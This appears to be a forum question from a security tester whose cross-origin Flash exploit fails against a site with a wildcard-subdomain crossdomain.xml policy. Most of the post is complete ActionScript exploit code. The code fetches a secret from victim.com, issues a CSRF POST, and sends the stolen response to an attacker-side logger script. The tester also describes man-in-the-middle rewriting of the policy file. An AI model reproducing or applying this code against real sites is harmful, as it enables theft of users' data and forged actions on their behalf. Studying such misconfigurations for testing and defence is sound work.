I am using an SWF generated from the following action script to make cross origin calls from the SWF hosted on http://something.subdomain.victim.com:8000/ to http://victim.com/a?secret=test.
https://victim.com has a permissive crossdomain.xml at https://victim.com/crossdomain.xml as given below.
<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.victim.com" />
</cross-domain-policy>
Action Script
// Adaptation of an exploit by John M as defined in
// https://medium.com/@x41x41x41/exploiting-crossdomain-xml-missconfigurations-3c8d407d05a8
// PHP serverside is replaced with a simpler python cgi. Thanks to trustedsec
package {
import flash.display.Sprite;
import flash.events.*;
import flash.net.URLRequestMethod;
import flash.net.URLRequest;
import flash.net.URLVariables;
import flash.net.URLLoader;
import flash.net.URLLoaderDataFormat;
public class crossDomain extends Sprite {
public function crossDomain() {
// Fetching secret.
var firstrequest:URLRequest = new URLRequest("https://victim.com/a?secret=test");
var firstloader:URLLoader = new URLLoader();
firstloader.addEventListener(Event.COMPLETE, completeHandler);
try {
firstloader.load(firstrequest);
} catch (error: Error) {
trace("Unable to load URL: " + error);
}
// Performing CSRF with a POST
var secondvariables:URLVariables = new URLVariables("a=test1&b=test2&c=test3&final=nothing");
var secondrequest:URLRequest = new URLRequest("http://victim.com/someaction.html");
secondrequest.method = URLRequestMethod.POST;
secondrequest.data = secondvariables;
var secondloader:URLLoader = new URLLoader();
secondloader.dataFormat = URLLoaderDataFormat.VARIABLES;
try {
secondloader.load(secondrequest);
} catch (error: Error) {
trace("Unable to load URL");
}
}
private function completeHandler(event: Event): void {
// Retreiving the HTTP responses to attacker server.
var request:URLRequest = new URLRequest("http://something.subdomain.victim.com:8000/cgi-bin/postlogger.py");
var variables:URLVariables = new URLVariables();
variables.data = event.target.data;
request.method = URLRequestMethod.POST;
request.data = variables;
var loader:URLLoader = new URLLoader();
try {
loader.load(request);
} catch (error: Error) {
trace("Unable to load URL");
}
}
}
}
- I tested this code locally by configuring localhost as victim origin which serves a wildcard crossdomain.xml [
<allow-access-from domain="*" />]- 127.0.0.1 as an attacker origin which serves crossDomain.swf
- The swf worked exactly as it is intended to requesting crossdomain.xml first followed by calls to the two URLs on origin localhost defined in the actionscript.
- However when hosting this on http://something.subdomain.victim.com:8000, the first step where it is retrieving the crossdomain.xml from https://victim.com/crossdomain.xml is happening. However the further requests are not.
- To ensure that it is not a crossdomain policy issue. I did a Man-In-The-Middle and replaced the
<allow-access-from domain="*.victim.com" />with<allow-access-from domain="*" />. - So at this stage, as far as the browser is concerned, the crossdomainxml for victim.com is a *. Yet further requests are not happening.
I can't find a potential reason for this confusing behavior. I am an actionscript noob. Any pointers on why this is happening would be highly appreciated.